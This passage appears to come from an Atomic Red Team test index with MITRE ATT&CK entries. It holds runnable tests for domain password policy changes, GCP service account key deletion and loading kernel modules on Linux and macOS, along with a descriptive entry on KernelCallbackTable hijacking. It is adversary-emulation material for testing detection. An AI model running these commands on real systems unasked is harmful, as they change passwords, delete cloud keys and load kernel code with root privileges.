cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: No Special Character in Password'
auto_generated_guid: 7d984ef2-2db2-4cec-b090-e637e1698f61
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default is
long and has upper and lower case and number but no special character)
type: string
default: UpperLowerLong333noSpecialChar
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: No Uppercase Character in Password'
auto_generated_guid: b299c120-44a7-4d68-b8e2-8ba5a28511ec
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default is
long and has and lower case and special character and number but no uppercase)
type: string
default: lower-long-special-333
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: No Lowercase Character in Password'
auto_generated_guid: 945da11e-977e-4dab-85d2-f394d03c5887
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default is
long and has and upper case and special character and number but no lowercase)
type: string
default: UPPER-LONG-SPECIAL-333
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: Only Two Character Classes'
auto_generated_guid: 784d1349-5a26-4d20-af5e-d6af53bae460
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default has
only upper and lower case characters)
type: string
default: onlyUPandLowChars
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: Common Password Use'
auto_generated_guid: 81959d03-c51f-49a1-bb24-23f1ec885578
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default is
Season and current year combo)
type: string
default: Spring$((Get-Date).Year)!
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: GCP - Delete Service Account Key
auto_generated_guid: 7ece1dea-49f1-4d62-bdcc-5801e3292510
description: "This Atomic will: \n - Create a service account\n - Create a
service account key, \n - Store the result of retrieving a single key for
that service account as a variable\n - Pass that variable for deletion\n
\ - Delete the service account\n\nThe idea for this Atomic came from a Rule
published by the Elastic team.\n\nIdentifies the deletion of an Identity and
Access Management (IAM) service account key in Google Cloud Platform (GCP).\nEach
service account is associated with two sets of public/private RSA key pairs
that are used to authenticate. \nIf a key is deleted, the application will
no longer be able to access Google Cloud resources using that key. A security
best practice is to rotate your service account keys regularly.\n\nReference:
https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml\n"
supported_platforms:
- iaas:gcp
input_arguments:
project_id:
description: ID of the GCP Project you to execute the command against.
type: string
default: atomic-test-1
service_name:
description: The name of the service account.
type: string
default: atomic-service-account
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project_id}
KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
cleanup_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform state rm google_service_account_key.key
terraform destroy -auto-approve
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install the terraform.
'
- description: 'Create dependency resources using terraform
'
prereq_command: 'stat "$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate"
'
get_prereq_command: |
cd "$PathToAtomicsFolder/T1098/src/T1098-17/"
terraform init
terraform apply -auto-approve
T1547.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/006
external_id: T1547.006
- source_name: Apple Developer Configuration Profile
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
September 12, 2024.
url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved November 17, 2024.
url: https://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved November 17, 2024.
url: https://tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved November 17, 2024.
url: https://objective-see.org/blog/blog_0x21.html
- source_name: Wikipedia Loadable Kernel Module
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:10.550Z'
name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
description: |-
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Linux
x_mitre_version: '1.4'
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23
description: 'This test uses the insmod command to load a kernel module for
Linux.
'
supported_platforms:
- linux
input_arguments:
module_name:
description: Name of the kernel module name.
type: string
default: T1547006
module_path:
description: Folder used to store the module.
type: path
default: "/tmp/T1547.006/T1547006.ko"
temp_folder:
description: Temp folder used to compile the code.
type: path
default: "/tmp/T1547.006"
module_source_path:
description: Path to download Gsecdump binary file
type: path
default: PathToAtomicsFolder/T1547.006/src
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location
'
prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{module_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi;
executor:
command: 'sudo insmod #{module_path}
'
cleanup_command: |
sudo rmmod #{module_name}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
name: bash
elevation_required: true
- name: MacOS - Load Kernel Module via kextload and kmutil
auto_generated_guid: f4391089-d3a5-4dd1-ab22-0419527f2672
description: 'This test uses the kextload and kmutil commands to load and unload
a MacOS kernel module.
'
supported_platforms:
- macos
input_arguments:
module_path:
description: Folder used to store the module.
type: path
default: "/Library/Extensions/SoftRAID.kext"
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location
'
prereq_command: 'if [ -d #{module_path} ] ; then exit 0; else exit 1 ; fi
'
get_prereq_command: 'exit 1
'
executor:
command: |
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
name: bash
elevation_required: true
- name: MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
auto_generated_guid: f0007753-beb3-41ea-9948-760785e4c1e5
description: |
This test uses the IOKit API to load a kernel module for macOS.
Harcoded to use SoftRAID kext
supported_platforms:
- macos
input_arguments:
src_path:
description: Folder used to store the module.
type: path
default: PathToAtomicsFolder/T1547.006/src/macos_kextload.c
exe_path:
description: Folder used to store the module.
type: path
default: "/tmp/T1547006_iokit_loader"
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location
'
prereq_command: 'if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
'
get_prereq_command: 'cc -o #{exe_path} #{src_path} -framework IOKit -framework
Foundation
'
executor:
command: |
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
name: bash
elevation_required: true
cleanup_command: 'rm -f #{exe_path}
'
- name: Snake Malware Kernel Driver Comadmin
auto_generated_guid: e5cb5564-cc7b-4050-86e8-f2d9eec1941f
description: "The following Atomic Test will write an file, comadmin.dat, to
disk. From the report, Snake's installer drops the kernel driver and a custom
DLL which is used to load the driver into a\nsingle AES encrypted file on
disk. Typically, this file is named “comadmin.dat” and is stored in the %windows%\\system32\\Com
directory. \nThis Atomic Test will write a hardcoded named file to disk in
the com directory named comadmin.dat.\n[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
\ \n"
supported_platforms:
- windows
executor:
command: '$examplePath = Join-Path $env:windir "system32\Com"; if (-not (Test-Path
$examplePath)) { New-Item -ItemType Directory -Path $examplePath | Out-Null
}; $exampleName = "comadmin.dat"; $exampleFullPath = Join-Path $examplePath
$exampleName; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes);
[System.IO.File]::WriteAllBytes($exampleFullPath, $randomBytes)
'
cleanup_command: '$examplePath = Join-Path $env:windir "system32\Com"; $exampleName
= "comadmin.dat"; $exampleFullPath = Join-Path $examplePath $exampleName;
if (Test-Path $exampleFullPath) { Remove-Item $exampleFullPath -Force }
'
name: powershell
elevation_required: true
T1574.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde
created: '2022-02-25T15:27:44.927Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/013
external_id: T1574.013
- source_name: 'FinFisher exposed '
description: 'Microsoft Defender Security Research Team. (2018, March 1).
FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex
virtual machines. Retrieved January 27, 2022.'
url: https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/
- source_name: NtQueryInformationProcess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
- source_name: Windows Process Injection KernelCallbackTable
description: 'odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable
used by FinFisher / FinSpy. Retrieved February 4, 2022.'
url: https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/
- source_name: Lazarus APT January 2022
description: Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus
APT leverages Windows Update client, GitHub in latest campaign. Retrieved
January 27, 2022.
url: https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.077Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
